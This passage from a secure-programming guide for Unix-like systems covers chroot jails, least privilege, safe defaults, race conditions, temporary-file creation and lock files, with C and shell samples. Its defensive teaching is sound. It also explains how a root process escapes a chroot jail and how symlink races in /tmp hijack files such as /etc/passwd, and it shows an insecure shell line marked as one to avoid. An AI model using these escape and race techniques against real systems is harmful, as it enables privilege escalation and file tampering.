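setfsuid(2) reports errors awkwardly by returning the *previous* fsuid rather
than -1, so the sketch verifies the change by calling it a second time):

```c
#include <sys/fsuid.h>
#include <sys/types.h>
#include <unistd.h>

/* A file server holding root privileges would call this before touching
 * files on behalf of a user: only the filesystem uid/gid change, so
 * filesystem permission checks use the user's ids while the process is
 * otherwise still root (and, per the text, the user cannot signal it). */
int act_as_user_for_files(uid_t uid, gid_t gid) {
    setfsuid(uid);
    setfsgid(gid);
    /* setfsuid() has no useful error return; read the values back. */
    if ((uid_t) setfsuid(uid) != uid) return -1;
    if ((gid_t) setfsgid(gid) != gid) return -1;
    return 0;   /* ...now open()/read()/write() the user's files... */
}
```

As the text notes, this is a Linux-only extension (<sys/fsuid.h>), so any use
should be isolated behind a portability layer.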
-----------------------------------------------------------------------------
7.4.6. Consider Using Chroot to Minimize Available Files
You can use chroot(2) to limit the files visible to your program. This
requires carefully setting up a directory (called the ``chroot jail'') and
correctly entering it. This can be a fairly effective technique for improving
a program's security - it's hard to interfere with files you can't see.
However, it depends on a whole bunch of assumptions, in particular, the
program must lack root privileges, it must not have any way to get root
privileges, and the chroot jail must be properly set up (e.g., be careful
what you put inside the chroot jail, and make sure that users can never
control its contents before calling chroot). I recommend using chroot(2)
where it makes sense to do so, but don't depend on it alone; instead, make it
part of a layered set of defenses. Here are a few notes about the use of
chroot(2):
  * The program can still use non-filesystem objects that are shared across

the entire machine (such as System V IPC objects and network sockets).
It's best to also use separate pseudo-users and/or groups, because all
Unix-like systems include the ability to isolate users; this will at
least limit the damage a subverted program can do to other programs. Note
    that most current Unix-like systems (including Linux) won't isolate
intentionally cooperating programs; if you're worried about malicious
programs cooperating, you need to get a system that implements some sort
of mandatory access control and/or limits covert channels.
  * Be sure to close any file descriptors to outside files if you don't
want them used later. In particular, don't have any descriptors open to
directories outside the chroot jail, or set up a situation where such a
descriptor could be given to it (e.g., via Unix sockets or an old
implementation of /proc). If the program is given a descriptor to a
directory outside the chroot jail, it could be used to escape out of the
chroot jail.
  * The chroot jail has to be set up to be secure - it must never be
controlled by a user and every file added must be carefully examined.
Don't use a normal user's home directory, subdirectory, or other
directory that can ever be controlled by a user as a chroot jail; use a
    separate directory specially set aside for the purpose. Using a
directory controlled by a user is a disaster - for example, the user
could create a ``lib'' directory containing a trojaned linker or libc
(and could link a setuid root binary into that space, if the files you
save don't use it). Place the absolute minimum number of files and
    directories there. Typically you'll have a /bin, /etc, /lib, and maybe
one or two others (e.g., /pub if it's an ftp server). Place in /bin only
what you need to run after doing the chroot(); sometimes you need nothing
at all (try to avoid placing a shell like /bin/sh there, though sometimes
that can't be helped). You may need a /etc/passwd and /etc/group so file
listings can show some correct names, but if so, try not to include the
real system's values, and certainly replace all passwords with "*".
In /lib, place only what you need; use ldd(1) to query each program in /
bin to find out what it needs, and only include them. On Linux, you'll
probably need a few basic libraries like ld-linux.so.2, and not much
else. Alternatively, recompile any necessary programs to be statically
linked, so that they don't need dynamically loaded libraries at all.
It's usually wiser to completely copy in all files, instead of making
hard links; while this wastes some time and disk space, it makes it so
that attacks on the chroot jail files do not automatically propagate into
the regular system's files. Mounting a /proc filesystem, on systems where
this is supported, is generally unwise. In fact, in very old versions of
Linux (versions 2.0.x, at least up through 2.0.38) it's a known security
flaw, since there are pseudo-directories in /proc that would permit a
chroot'ed program to escape. Linux kernel 2.2 fixed this known problem,
but there may be others; if possible, don't do it.
  * Chroot really isn't effective if the program can acquire root privilege.
For example, the program could use calls like mknod(2) to create a device
file that can view physical memory, and then use the resulting device
file to modify kernel memory to give itself whatever privileges it
desired. Another example of how a root program can break out of chroot is
demonstrated at [http://www.suid.edu/source/breakchroot.c] http://
www.suid.edu/source/breakchroot.c. In this example, the program opens a
file descriptor for the current directory, creates and chroots into a
subdirectory, sets the current directory to the previously-opened current
directory, repeatedly cd's up from the current directory (which since it
is outside the current chroot succeeds in moving up to the real
filesystem root), and then calls chroot on the result. By the time you
read this, these weaknesses may have been plugged, but the reality is
that root privilege has traditionally meant ``all privileges'' and it's
hard to strip them away. It's better to assume that a program requiring
continuous root privileges will only be mildly helped using chroot(). Of
course, you may be able to break your program into parts, so that at
least part of it can be in a chroot jail.
-----------------------------------------------------------------------------
7.4.7. Consider Minimizing the Accessible Data
Consider minimizing the amount of data that can be accessed by the user. For
example, in CGI scripts, place all data used by the CGI script outside of the
document tree unless there is a reason the user needs to see the data
directly. Some people have the false notion that, by not publicly providing a
link, no one can access the data, but this is simply not true.
-----------------------------------------------------------------------------
7.4.8. Consider Minimizing the Resources Available
Consider minimizing the computer resources available to a given process so
that, even if it ``goes haywire,'' its damage can be limited. This is a
fundamental technique for preventing a denial of service. For network
servers, a common approach is to set up a separate process for each session,
and for each process limit the amount of CPU time (et cetera) that session
can use. That way, if an attacker makes a request that chews up memory or
uses 100% of the CPU, the limits will kick in and prevent that single session
from interfering with other tasks. Of course, an attacker can establish many
sessions, but this at least raises the bar for an attack. See Section 3.6 for
more information on how to set these limits (e.g., ulimit(1)).
-----------------------------------------------------------------------------
7.5. Minimize the Functionality of a Component
In a related move, minimize the amount of functionality provided by your
component. If it does several functions, consider breaking its implementation
up into those smaller functions. That way, users who don't need some
functions can disable just those portions. This is particularly important
when a flaw is discovered - this way, users can disable just one component
and still use the other parts.
-----------------------------------------------------------------------------
7.6. Avoid Creating Setuid/Setgid Scripts
Many Unix-like systems, in particular Linux, simply ignore the setuid and
setgid bits on scripts to avoid the race condition described earlier. Since
support for setuid scripts varies on Unix-like systems, they're best avoided
in new applications where possible. As a special case, Perl includes a
special setup to support setuid Perl scripts, so using setuid and setgid is
acceptable in Perl if you truly need this kind of functionality. If you need
to support this kind of functionality in your own interpreter, examine how
Perl does this. Otherwise, a simple approach is to ``wrap'' the script with a
small setuid/setgid executable that creates a safe environment (e.g., clears
and sets environment variables) and then calls the script (using the script's
full path). Make sure that the script cannot be changed by an attacker! Shell
scripting languages have additional problems, and really should not be setuid
/setgid; see Section 10.4 for more information about this.
-----------------------------------------------------------------------------
7.7. Configure Safely and Use Safe Defaults
Configuration is considered to currently be the number one security problem.
Therefore, you should spend some effort to (1) make the initial installation
secure, and (2) make it easy to reconfigure the system while keeping it
secure.
Never have the installation routines install a working ``default'' password.
If you need to install new ``users'', that's fine - just set them up with an
impossible password, leaving time for administrators to set the password (and
leaving the system secure before the password is set). Administrators will
probably install hundreds of packages and almost certainly forget to set the
password - it's likely they won't even know to set it, if you create a
default password.
A program should have the most restrictive access policy until the
administrator has a chance to configure it. Please don't create ``sample''
working users or ``allow access to all'' configurations as the starting
configuration; many users just ``install everything'' (installing all
available services) and never get around to configuring many services. In
some cases the program may be able to determine that a more generous policy
is reasonable by depending on the existing authentication system, for
example, an ftp server could legitimately determine that a user who can log
into a user's directory should be allowed to access that user's files. Be
careful with such assumptions, however.
Have installation scripts install a program as safely as possible. By
default, install all files as owned by root or some other system user and
make them unwriteable by others; this prevents non-root users from installing
viruses. Indeed, it's best to make them unreadable by all but the trusted
user. Allow non-root installation where possible as well, so that users
without root privileges and administrators who do not fully trust the
installer can still use the program.
When installing, check to make sure that any assumptions necessary for
security are true. Some library routines are not safe on some platforms; see
the discussion of this in Section 8.1. If you know which platforms your
application will run on, you need not check their specific attributes, but in
that case you should check to make sure that the program is being installed
on only one of those platforms. Otherwise, you should require a manual
override to install the program, because you don't know if the result will be
secure.
Try to make configuration as easy and clear as possible, including
post-installation configuration. Make using the ``secure'' approach as easy
as possible, or many users will use an insecure approach without
understanding the risks. On Linux, take advantage of tools like linuxconf, so
that users can easily configure their system using an existing
infrastructure.
If there's a configuration language, the default should be to deny access
until the user specifically grants it. Include many clear comments in the
sample configuration file, if there is one, so the administrator understands
what the configuration does.
-----------------------------------------------------------------------------
7.8. Load Initialization Values Safely
Many programs read an initialization file to allow their defaults to be
configured. You must ensure that an attacker can't change which
initialization file is used, nor create or modify that file. Often you should
not use the current directory as a source of this information, since if the
program is used as an editor or browser, the user may be viewing the
directory controlled by someone else. Instead, if the program is a typical
user application, you should load any user defaults from a hidden file or
directory contained in the user's home directory. If the program is setuid/
setgid, don't read any file controlled by the user unless you carefully
filter it as an untrusted (potentially hostile) input. Trusted configuration
values should be loaded from somewhere else entirely (typically from a file
in /etc).
-----------------------------------------------------------------------------
7.9. Fail Safe
A secure program should always ``fail safe'', that is, it should be designed
so that if the program does fail, the safest result should occur. For
security-critical programs, that usually means that if some sort of
misbehavior is detected (malformed input, reaching a ``can't get here''
state, and so on), then the program should immediately deny service and stop
processing that request. Don't try to ``figure out what the user wanted'':
just deny the service. Sometimes this can decrease reliability or useability
(from a user's perspective), but it increases security. There are a few cases
where this might not be desired (e.g., where denial of service is much worse
than loss of confidentiality or integrity), but such cases are quite rare.
Note that I recommend ``stop processing the request'', not ``fail
altogether''. In particular, most servers should not completely halt when
given malformed input, because that creates a trivial opportunity for a
denial of service attack (the attacker just sends garbage bits to prevent you
from using the service). Sometimes taking the whole server down is necessary,
in particular, reaching some ``can't get here'' states may signal a problem
so drastic that continuing is unwise.
Consider carefully what error message you send back when a failure is
detected. If you send nothing back, it may be hard to diagnose problems, but
sending back too much information may unintentionally aid an attacker.
Usually the best approach is to reply with ``access denied'' or
``miscellaneous error encountered'' and then write more detailed information
to an audit log (where you can have more control over who sees the
information).
-----------------------------------------------------------------------------
7.10. Avoid Race Conditions
A ``race condition'' can be defined as ``Anomalous behavior due to unexpected
critical dependence on the relative timing of events'' [FOLDOC]. Race
conditions generally involve one or more processes accessing a shared
resource (such as a file or variable), where this multiple access has not been
properly controlled.
In general, processes do not execute atomically; another process may
interrupt it between essentially any two instructions. If a secure program's
process is not prepared for these interruptions, another process may be able
to interfere with the secure program's process. Any pair of operations in a
secure program must still work correctly if arbitrary amounts of another
process's code are executed between them.
Race condition problems can be notionally divided into two categories:
  * Interference caused by untrusted processes. Some security taxonomies call
this problem a ``sequence'' or ``non-atomic'' condition. These are
conditions caused by processes running other, different programs, which
``slip in'' other actions between steps of the secure program. These
other programs might be invoked by an attacker specifically to cause the
problem. This book will call these sequencing problems.
  * Interference caused by trusted processes (from the secure program's point
of view). Some taxonomies call these deadlock, livelock, or locking
failure conditions. These are conditions caused by processes running the
``same'' program. Since these different processes may have the ``same''
privileges, if not properly controlled they may be able to interfere with
each other in a way other programs can't. Sometimes this kind of
interference can be exploited. This book will call these locking
problems.
-----------------------------------------------------------------------------
7.10.1. Sequencing (Non-Atomic) Problems
In general, you must check your code for any pair of operations that might
fail if arbitrary code is executed between them.
Note that loading and saving a shared variable are usually implemented as
separate operations and are not atomic. This means that an ``increment
variable'' operation is usually converted into separate load, increment, and
save operations, so if the variable's memory is shared, another process may
interfere with the increment.
Secure programs must determine if a request should be granted, and if so, act
on that request. There must be no way for an untrusted user to change
anything used in this determination before the program acts on it. This kind
of race condition is sometimes termed a ``time of check - time of use''
(TOCTOU) race condition.
-----------------------------------------------------------------------------
7.10.1.1. Atomic Actions in the Filesystem
The problem of failing to perform atomic actions repeatedly comes up in the
filesystem. In general, the filesystem is a shared resource used by many
programs, and some programs may interfere with its use by other programs.
Secure programs should generally avoid using access(2) to determine if a
request should be granted, followed later by open(2), because users may be
able to move files around between these calls, possibly creating symbolic
links or files of their own choosing instead. A secure program should instead
set its effective id or filesystem id, then make the open call directly. It's
possible to use access(2) securely, but only when a user cannot affect the
file or any directory along its path from the filesystem root.
When creating a file, you should open it using the modes O_CREAT | O_EXCL and
grant only very narrow permissions (only to the current user); you'll also
need to prepare for having the open fail. If you need to be able to open the
file (e.g., to prevent a denial-of-service), you'll need to repetitively (1)
create a ``random'' filename, (2) open the file as noted, and (3) stop
repeating when the open succeeds.
Ordinary programs can become security weaknesses if they don't create files
properly. For example, the ``joe'' text editor had a weakness called the
``DEADJOE'' symlink vulnerability. When joe was exited in a nonstandard way
(such as a system crash, closing an xterm, or a network connection going
down), joe would unconditionally append its open buffers to the file
"DEADJOE". This could be exploited by the creation of DEADJOE symlinks in
directories where root would normally use joe. In this way, joe could be used
to append garbage to potentially-sensitive files, resulting in a denial of
service and/or unintentional access.
As another example, when performing a series of operations on a file's
meta-information (such as changing its owner, stat-ing the file, or changing
its permission bits), first open the file and then use the operations on open
files. This means use the fchown( ), fstat( ), or fchmod( ) system calls,
instead of the functions taking filenames such as chown(), chgrp(), and chmod
(). Doing so will prevent the file from being replaced while your program is
running (a possible race condition). For example, if you close a file and
then use chmod() to change its permissions, an attacker may be able to move
or remove the file between those two steps and create a symbolic link to
another file (say /etc/passwd). Other interesting files include /dev/zero,
which can provide an infinitely-long data stream of input to a program; if an
attacker can ``switch'' the file midstream, the results can be dangerous.
But even this gets complicated - when creating files, you must give them as
minimal a set of rights as possible, and then change the rights to be more
expansive if you desire. Generally, this means you need to use umask and/or
open's parameters to limit initial access to just the user and user group.
For example, if you create a file that is initially world-readable, then try
to turn off the ``world readable'' bit, an attacker could try to open the
file while the permission bits said this was okay. On most Unix-like systems,
permissions are only checked on open, so this would result in an attacker
having more privileges than intended.
In general, if multiple users can write to a directory in a Unix-like system,
you'd better have the ``sticky'' bit set on that directory, and sticky
directories had better be implemented. It's much better to completely avoid
the problem, however, and create directories that only a trusted special
process can access (and then implement that carefully). The traditional Unix
temporary directories (/tmp and /var/tmp) are usually implemented as
``sticky'' directories, and all sorts of security problems can still surface,
as we'll see next.
-----------------------------------------------------------------------------
7.10.1.2. Temporary Files
This issue of correctly performing atomic operations particularly comes up
when creating temporary files. Temporary files in Unix-like systems are
traditionally created in the /tmp or /var/tmp directories, which are shared
by all users. A common trick by attackers is to create symbolic links in the
temporary directory to some other file (e.g., /etc/passwd) while your secure
program is running. The attacker's goal is to create a situation where the
secure program determines that a given filename doesn't exist, the attacker
then creates the symbolic link to another file, and then the secure program
performs some operation (but now it actually opened an unintended file).
Often important files can be clobbered or modified this way. There are many
variations to this attack, such as creating normal files, all based on the
idea that the attacker can create (or sometimes otherwise access) file system
objects in the same directory used by the secure program for temporary files.
Michal Zalewski exposed in 2002 another serious problem with temporary
directories involving automatic cleaning of temporary directories. For more
information, see his posting to Bugtraq dated December 20, 2002, (subject "
[RAZOR] Problems with mkstemp()"). Basically, Zalewski notes that it's a
common practice to have a program automatically sweep temporary directories
like /tmp and /var/tmp and remove "old" files that have not been accessed for
a while (e.g., several days). Such programs are sometimes called "tmp
cleaners" (pronounced "temp cleaners"). Possibly the most common tmp cleaner
is "tmpwatch" by Erik Troan and Preston Brown of Red Hat Software; another
common one is 'stmpclean' by Stanislav Shalunov; many administrators roll
their own as well. Unfortunately, the existence of tmp cleaners creates an
opportunity for new security-critical race conditions; an attacker may be
able to arrange things so that the tmp cleaner interferes with the secure
program. For example, an attacker could create an "old" file, arrange for the
tmp cleaner to plan to delete the file, delete the file himself, and run a
secure program that creates the same file - now the tmp cleaner will delete
the secure program's file! Or, imagine that a secure program can have long
delays after using the file (e.g., a setuid program stopped with SIGSTOP and
resumed after many days with SIGCONT, or simply intentionally creating a lot
of work). If the temporary file isn't accessed for long enough, it is likely
to be removed by the tmp cleaner.
The general problem when creating files in these shared directories is that
you must guarantee that the filename you plan to use doesn't already exist at
time of creation, and atomically create the file. Checking ``before'' you
create the file doesn't work, because after the check occurs, but before
creation, another process can create that file with that filename. Using an
``unpredictable'' or ``unique'' filename doesn't work in general, because
another process can often repeatedly guess until it succeeds. Once you create
the file atomically, you must always use the returned file descriptor (or file
stream, if created from the file descriptor using routines like fdopen()).
You must never re-open the file, or use any operations that use the filename
as a parameter - always use the file descriptor or associated stream.
Otherwise, the tmpwatch race issues noted above will cause problems. You
can't even create the file, close it, and re-open it, even if the permissions
limit who can open it. Note that comparing the descriptor and a reopened file
to verify inode numbers, creation times or file ownership is not sufficient -
please refer to "Symlinks and Cryogenic Sleep" by Olaf Kirch.
Fundamentally, to create a temporary file in a shared (sticky) directory, you
must repetitively: (1) create a ``random'' filename, (2) open it using
O_CREAT | O_EXCL and very narrow permissions (which atomically creates the
file and fails if it's not created), and (3) stop repeating when the open
succeeds.
According to the 1997 ``Single Unix Specification'', the preferred method for
creating an arbitrary temporary file (using the C interface) is tmpfile(3).
The tmpfile(3) function creates a temporary file and opens a corresponding
stream, returning that stream (or NULL if it didn't). Unfortunately, the
specification doesn't make any guarantees that the file will be created
securely. In earlier versions of this book, I stated that I was concerned
because I could not assure myself that all implementations do this securely.
I've since found that older System V systems have an insecure implementation
of tmpfile(3) (as well as insecure implementations of tmpnam(3) and tempnam
(3)), so on at least some systems it's absolutely useless. Library
implementations of tmpfile(3) should securely create such files, of course,
but users don't always realize that their system libraries have this security
flaw, and sometimes they can't do anything about it.
Kris Kennaway recommends using mkstemp(3) for making temporary files in
general. His rationale is that you should use well-known library functions to
perform this task instead of rolling your own functions, and that this
function has well-known semantics. This is certainly a reasonable position. I
would add that, if you use mkstemp(3), be sure to use umask(2) to limit the
resulting temporary file permissions to only the owner. This is because some
implementations of mkstemp(3) (basically older ones) make such files readable
and writable by all, creating a condition in which an attacker can read or
write private data in this directory. A minor nuisance is that mkstemp(3)
doesn't directly support the environment variables TMP or TMPDIR (as
discussed below), so if you want to support them you have to add code to do
so. Here's a program in C that demonstrates how to use mkstemp(3) for this
purpose, both directly and when adding support for TMP and TMPDIR:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
void failure(const char *msg) {
fprintf(stderr, "%s\n", msg);
exit(1);
}
/*
* Given a "pattern" for a temporary filename
* (starting with the directory location and ending in XXXXXX),
* create the file and return it.
 * This routine unlinks the file, so normally it won't appear in
* a directory listing.
* The pattern will be changed to show the final filename.
*/
FILE *create_tempfile(char *temp_filename_pattern)
{
int temp_fd;
mode_t old_mode;
FILE *temp_file;
old_mode = umask(077); /* Create file with restrictive permissions */
temp_fd = mkstemp(temp_filename_pattern);
(void) umask(old_mode);
if (temp_fd == -1) {
failure("Couldn't open temporary file");
}
if (!(temp_file = fdopen(temp_fd, "w+b"))) {
failure("Couldn't create temporary file's file descriptor");
}
if (unlink(temp_filename_pattern) == -1) {
failure("Couldn't unlink temporary file");
}
return temp_file;
}
/*
* Given a "tag" (a relative filename ending in XXXXXX),
* create a temporary file using the tag. The file will be created
* in the directory specified in the environment variables
* TMPDIR or TMP, if defined and we aren't setuid/setgid, otherwise
* it will be created in /tmp. Note that root (and su'd to root)
* _will_ use TMPDIR or TMP, if defined.
*
*/
FILE *smart_create_tempfile(char *tag)
{
char *tmpdir = NULL;
char *pattern;
FILE *result;
if ((getuid()==geteuid()) && (getgid()==getegid())) {
if (! ((tmpdir=getenv("TMPDIR")))) {
tmpdir=getenv("TMP");
}
}
if (!tmpdir) {tmpdir = "/tmp";}
pattern = malloc(strlen(tmpdir)+strlen(tag)+2);
if (!pattern) {
failure("Could not malloc tempfile pattern");
}
strcpy(pattern, tmpdir);
strcat(pattern, "/");
strcat(pattern, tag);
result = create_tempfile(pattern);
free(pattern);
return result;
}
int main(void) {
int c;
FILE *demo_temp_file1;
FILE *demo_temp_file2;
char demo_temp_filename1[] = "/tmp/demoXXXXXX";
char demo_temp_filename2[] = "second-demoXXXXXX";
demo_temp_file1 = create_tempfile(demo_temp_filename1);
demo_temp_file2 = smart_create_tempfile(demo_temp_filename2);
fprintf(demo_temp_file2, "This is a test.\n");
printf("Printing temporary file contents:\n");
rewind(demo_temp_file2);
while ( (c=fgetc(demo_temp_file2)) != EOF) {
putchar(c);
}
putchar('\n');
printf("Exiting; you'll notice that there are no temporary files on exit.\n");
}
Kennaway states that if you can't use mkstemp(3), then make yourself a
directory using mkdtemp(3), which is protected from the outside world.
However, as Michal Zalewski notes, this is a bad idea if there are tmp
cleaners in use; instead, use a directory inside the user's HOME. Finally, if
you really have to use the insecure mktemp(3), use lots of X's - he suggests
10 (if your libc allows it) so that the filename can't easily be guessed
(using only 6 X's means that 5 are taken up by the PID, leaving only one
random character and allowing an attacker to mount an easy race condition).
Note that this is fundamentally insecure, so you should normally not do this.
I add that you should avoid tmpnam(3) as well - some of its uses aren't
reliable when threads are present, and it doesn't guarantee that it will work
correctly after TMP_MAX uses (yet most practical uses must be inside a loop).
In general, you should avoid using the insecure functions such as mktemp(3)
or tmpnam(3), unless you take specific measures to counter their insecurities
or test for a secure library implementation as part of your installation
routines. If you ever want to make a file in /tmp or a world-writable
directory (or group-writable, if you don't trust the group) and don't want to
use mk*temp() (e.g. you intend for the file to be predictably named), then
always use the O_CREAT and O_EXCL flags to open() and check the return value.
If you fail the open() call, then recover gracefully (e.g. exit).
The GNOME programming guidelines recommend the following C code when creating
filesystem objects in shared (temporary) directories to securely open
temporary files [Quintero 2000]:
char *filename;
int fd;
do {
filename = tempnam (NULL, "foo");
fd = open (filename, O_CREAT | O_EXCL | O_TRUNC | O_RDWR, 0600);
free (filename);
} while (fd == -1);
Note that, although the insecure function tempnam(3) is being used, it is
wrapped inside a loop using O_CREAT and O_EXCL to counteract its security
weaknesses, so this use is okay. Note that you need to free() the filename.
You should close() and unlink() the file after you are done. If you want to
use the Standard C I/O library, you can use fdopen() with mode "w+b" to
transform the file descriptor into a FILE *. Note that this approach won't
work over NFS version 2 (v2) systems, because older NFS doesn't correctly
support O_EXCL. Note that one minor disadvantage to this approach is that,
since tempnam can be used insecurely, various compilers and security scanners
may give you spurious warnings about its use. This isn't a problem with
mkstemp(3).
If you need a temporary file in a shell script, you're probably best off
using pipes, using a local directory (e.g., something inside the user's home
directory), or in some cases using the current directory. That way, there's
no sharing unless the user permits it. If you really want/need the temporary
file to be in a shared directory like /tmp, do not use the traditional shell
technique of using the process id in a template and just creating the file
using normal operations like ">". Shell scripts can use "$$" to indicate the
PID, but the PID can be easily determined or guessed by an attacker, who can
then pre-create files or links with the same name. Thus the following
"typical" shell script is unsafe:
echo "This is a test" > /tmp/test$$ # DON'T DO THIS.
If you need a temporary file or directory in a shell script, and you want it
in /tmp, a solution sometimes suggested is to use mktemp(1), which is
intended for use in shell scripts (note that mktemp(1) and mktemp(3) are
different things). However, as Michal Zalewski notes, this is insecure in
many environments that run tmp cleaners; the problem is that when a
privileged program sweeps through a temporary directory, it will probably
expose a race condition. Even if this weren't true, I do not recommend using
shell scripts that create temporary files in shared directories; creating
such files in private directories or using pipes instead is generally
preferable, even if you're sure your tmpwatch program is okay (or that you
have no local users). If you must use mktemp(1), note that mktemp(1) takes a
template, then creates a file or directory using O_EXCL and returns the
resulting name; thus, mktemp(1) won't work on NFS version 2 filesystems. Here
are some examples of correct use of mktemp(1) in Bourne shell scripts; these
examples are straight from the mktemp(1) man page:
# Simple use of mktemp(1), where the script should quit
# if it can't get a safe temporary file.
# Note that this will be INSECURE on many systems, since they use
# tmpwatch-like programs that will erase "old" files and expose race
# conditions.
TMPFILE=`mktemp /tmp/$0.XXXXXX` || exit 1
echo "program output" >> $TMPFILE
# Simple example, if you want to catch the error:
TMPFILE=`mktemp -q /tmp/$0.XXXXXX`
if [ $? -ne 0 ]; then
echo "$0: Can't create temp file, exiting..."
exit 1
fi
Perl programmers should use File::Temp, which tries to provide a
cross-platform means of securely creating temporary files. However, read the
documentation carefully on how to use it properly first; it includes
interfaces to unsafe functions as well. I suggest explicitly setting its
safe_level to HIGH; this will invoke additional security checks. [http://
search.cpan.org/author/JHI/perl-5.8.0/lib/File/Temp.pm] The Perl 5.8
documentation of File::Temp is available on-line.
Don't reuse a temporary filename (i.e. remove and recreate it), no matter how
you obtained the ``secure'' temporary filename in the first place. An
attacker can observe the original filename and hijack it before you recreate
it the second time. And of course, always use appropriate file permissions.
For example, only allow world/group access if you need the world or a group
to access the file, otherwise keep it mode 0600 (i.e., only the owner can
read or write it).
Clean up after yourself, either by using an exit handler, or making use of
UNIX filesystem semantics and unlink()ing the file immediately after creation
so the directory entry goes away but the file itself remains accessible until
the last file descriptor pointing to it is closed. You can then continue to
access it within your program by passing around the file descriptor.
Unlinking the file has a lot of advantages for code maintenance: the file is
automatically deleted, no matter how your program crashes. It also decreases
the likelihood that a maintainer will insecurely use the filename (they need
to use the file descriptor instead). The one minor problem with immediate
unlinking is that it makes it slightly harder for administrators to see how
disk space is being used, since they can't simply look at the file system by
name.
You might consider ensuring that your code for Unix-like systems respects the
environment variables TMP or TMPDIR if the provider of these variable values
is trusted. By doing so, you make it possible for users to move their
temporary files into an unshared directory (and eliminating the problems
discussed here), such as a subdirectory inside their home directory. Recent
versions of Bastille can set these variables to reduce the sharing between
users. Unfortunately, many users set TMP or TMPDIR to a shared directory (say
/tmp), so your secure program must still correctly create temporary files
even if these environment variables are set. This is one advantage of the
GNOME approach, since at least on some systems tempnam(3) automatically uses
TMPDIR, while the mkstemp(3) approach requires more code to do this. Please
don't create yet more environment variables for temporary directories (such
as TEMP), and in particular don't create a different environment name for
each application (e.g., don't use "MYAPP_TEMP"). Doing so greatly complicates
managing systems, and users wanting a special temporary directory for a
specific application can just set the environment variable specially when
running that particular application. Of course, if these environment
variables might have been set by an untrusted source, you should ignore them
- which you'll do anyway if you follow the advice in Section 5.2.3.
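A minimal sketch of respecting TMPDIR, assuming the environment has already been vetted as described in Section 5.2.3 (the helper name temp_dir is illustrative):

```c
#include <stdlib.h>

/* Return the directory to use for temporary files: $TMPDIR if it is
 * set and non-empty (and its source is trusted), otherwise /tmp.
 * The caller must still create files there with O_CREAT|O_EXCL,
 * since TMPDIR may well point at a shared directory. */
const char *temp_dir(void)
{
    const char *d = getenv("TMPDIR");
    return (d != NULL && d[0] != '\0') ? d : "/tmp";
}
```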
These techniques don't work if the temporary directory is remotely mounted
using NFS version 2 (NFSv2), because NFSv2 doesn't properly support O_EXCL.
See Section 7.10.2.1 for more information. NFS version 3 and later properly
support O_EXCL; the simple solution is to ensure that temporary directories
are either local or, if mounted using NFS, mounted using NFS version 3 or
later. There is a technique for safely creating temporary files on NFS v2,
involving the use of link(2) and stat(2), but it's complex; see Section
7.10.2.1 which has more information about this.
As an aside, it's worth noting that FreeBSD has recently changed the mk*temp
() family to get rid of the PID component of the filename and replace the
entire thing with base-62 encoded randomness. This drastically raises the
number of possible temporary files for the "default" usage of 6 X's, meaning
that even mktemp(3) with 6 X's is reasonably (probabilistically) secure
against guessing, except under very frequent usage. However, if you also
follow the guidance here, you'll eliminate the problem they're addressing.
Much of this information on temporary files was derived from Kris Kennaway's
posting to Bugtraq about temporary files on December 15, 2000.
I should note that the Openwall Linux patch from [http://www.openwall.com/
linux/] http://www.openwall.com/linux/ includes an optional ``temporary file
directory'' policy that counters many temporary file based attacks. The Linux
Security Module (LSM) project includes an "owlsm" module that implements some
of the OpenWall ideas, so Linux Kernels with LSM can quickly insert these
rules into a running system. When enabled, it has two protections:
  * Hard links: Processes may not make hard links to files in certain cases.
The OpenWall documentation states that "Processes may not make hard links
to files they do not have write access to." In the LSM version, the rules
are as follows: if both the process' uid and fsuid (usually the same as
the euid) differ from the linked-to file's uid, the process uid
is not root, and the process lacks the FOWNER capability, then the hard
link is forbidden. The check against the process uid may be dropped
someday (it is a work-around for the atd(8) program), at which point
the rules would be: if the process' fsuid (usually the same as the
euid) differs from the linked-to file's uid and the process
lacks the FOWNER capability, then the hard link is forbidden. In other
words, you can only create hard links to files you own, unless you have
the FOWNER capability.
  * Symbolic links (symlinks): Certain symlinks are not followed. The
original OpenWall documentation states that "root processes may not
follow symlinks that are not owned by root", but the actual rules (from
looking at the code) are more complicated. In the LSM version, if the
directory is sticky ("+t" mode, used in shared directories like /tmp),
symlinks are not followed if the symlink was created by anyone other than
either the owner of the directory or the current process' fsuid (which is
usually the effective uid).
Many systems do not implement this Openwall policy, so you can't depend on
it in general to protect your system. However, I encourage using this
policy on your own system, and please make sure that your application will
work when this policy is in place.
-----------------------------------------------------------------------------
7.10.2. Locking
There are often situations in which a program must ensure that it has
exclusive rights to something (e.g., a file, a device, and/or existence of a
particular server process). Any system which locks resources must deal with
the standard problems of locks, namely, deadlocks (``deadly embraces''),
livelocks, and releasing ``stuck'' locks if a program doesn't clean up its
locks. A deadlock can occur if programs are stuck waiting for each other to
release resources. For example, a deadlock would occur if process 1 locks
resources A and waits for resource B, while process 2 locks resource B and
waits for resource A. Many deadlocks can be prevented by simply requiring all
processes that lock multiple resources to lock them in the same order (e.g.,
alphabetically by lock name).
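The lock-ordering rule can be sketched with POSIX threads: pick any canonical order (here, by address) and have every caller acquire locks in that order. The helper names are illustrative:

```c
#include <pthread.h>

/* Acquire two locks in a canonical order (here: by address) so that
 * every caller locks them the same way.  This prevents the
 * A-waits-for-B while B-waits-for-A deadlock described above. */
void lock_both(pthread_mutex_t *a, pthread_mutex_t *b)
{
    if (a > b) { pthread_mutex_t *t = a; a = b; b = t; }
    pthread_mutex_lock(a);
    pthread_mutex_lock(b);
}

void unlock_both(pthread_mutex_t *a, pthread_mutex_t *b)
{
    /* Release order doesn't matter for deadlock avoidance. */
    pthread_mutex_unlock(a);
    pthread_mutex_unlock(b);
}
```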
-----------------------------------------------------------------------------
7.10.2.1. Using Files as Locks
On Unix-like systems resource locking has traditionally been done by creating
a file to indicate a lock, because this is very portable. It also makes it
easy to ``fix'' stuck locks, because an administrator can just look at the
filesystem to see what locks have been set. Stuck locks can occur because the
program failed to clean up after itself (e.g., it crashed or malfunctioned)
or because the whole system crashed. Note that these are ``advisory'' (not
``mandatory'') locks - all processes needing the resource must cooperate to
use these locks.
However, there are several traps to avoid. First, don't use the technique
used by very old Unix C programs, which is calling creat(), or its open()
equivalent with mode O_WRONLY | O_CREAT | O_TRUNC, with the file mode
set to 0 (no permissions). For normal users on normal file systems, this
works, but this approach fails to lock the file when the user has root
privileges. Root can always perform this operation, even when the file
already exists. In fact, old versions of Unix had this particular problem in
the old editor ``ed'' -- the symptom was that occasionally portions of the
password file would be placed in user's files [Rochkind 1985, 22]! Instead,
if you're creating a lock for processes that are on the local filesystem, you
